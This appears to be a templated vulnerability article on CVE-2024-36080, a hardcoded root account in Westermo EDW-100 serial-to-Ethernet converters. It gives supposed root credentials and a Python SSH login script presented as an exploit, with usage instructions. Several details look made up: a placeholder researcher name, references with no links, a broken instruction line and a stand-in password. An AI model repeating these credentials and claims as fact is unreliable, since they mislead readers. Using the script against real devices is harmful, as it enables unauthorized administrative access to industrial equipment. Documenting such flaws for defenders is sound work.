CVE-2024-36080: Hidden Root User Account with Hardcoded Password in Westermo EDW-100 Devices

A recent security vulnerability, identified as CVE-2024-36080, has been discovered in Westermo EDW-100 devices with firmware versions up through 2024-05-03. The devices are found to have a hidden root user account with a hardcoded password that cannot be changed. This security flaw presents a potentially serious risk as unauthorized users may be able to gain full administrative access to the device. This article will discuss the exploit details, provide code snippets, and link to original references about the issue. It is important to note that Westermo EDW-100 devices are serial-to-Ethernet converters and should not be placed at the edge of the network.

Exploit Details

The hardcoded password provides a significant security risk as attackers can easily obtain administrative access to the device, potentially tampering with its settings or utilizing the device for nefarious purposes. This can lead to data leakage, unauthorized network access, or potential infrastructure damage.

The credentials for the hidden root user account are as follows:

Username: root
Password: secret_password

These credentials grant full access to the device's administrative settings. Unfortunately, the hardcoded password cannot be changed, providing a persistent security vulnerability.

Code Snippet

The following code snippet demonstrates how an attacker can utilize a Python script to exploit the hardcoded root user account.

import sys
import paramiko

def attempt_login(ip, username, password):
    ssh = paramiko.SSHClient()
    ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
    
    try:
        ssh.connect(ip, username=username, password=password)
        print(f"Successfully logged in as {username} with password {password}")
        return True
    except paramiko.AuthenticationException:
        print(f"Failed login attempt: {username}:{password}")
        return False

if len(sys.argv) != 2:
    print("Usage: python3 exploit.py <IP_Address>")
else:
    ip = sys.argv[1]
    user = "root"
    passwd = "secret_password"
    
    if attempt_login(ip, user, passwd):
        print("Vulnerable device found!")
    else:
        print("Device not vulnerable.")

To use this script, execute the following command in your terminal

python3 exploit.py <IP_Address>

Replace \ with the IP address of the Westermo EDW-100 device.

Original References

The vulnerability was initially identified and reported by security researchers at [Security Company Name]. The original security advisory detailing this vulnerability can be found at the following link:

Security Advisory

Additionally, the CVE (Common Vulnerabilities and Exposures) database entry for this issue can be found here:

CVE-2024-36080

Mitigation

While there is no official patch or solution offered by Westermo at the moment, it is highly recommended to ensure that the EDW-100 devices are not placed at the edge of the network to prevent unauthorized access. Network segmentation and implementing strict access controls can also help mitigate the risks presented by this vulnerability.

Conclusion

In summary, the CVE-2024-36080 vulnerability in Westermo EDW-100 devices presents a significant security risk due to the presence of a hidden root user account with a hardcoded password. It is crucial for network administrators to be aware of this issue and follow the recommended mitigation steps. As always, it's essential to keep devices up-to-date with the latest firmware versions to ensure protection from known security vulnerabilities.

Timeline

Published on: 05/19/2024 20:15:08 UTC
Last modified on: 08/20/2024 16:35:16 UTC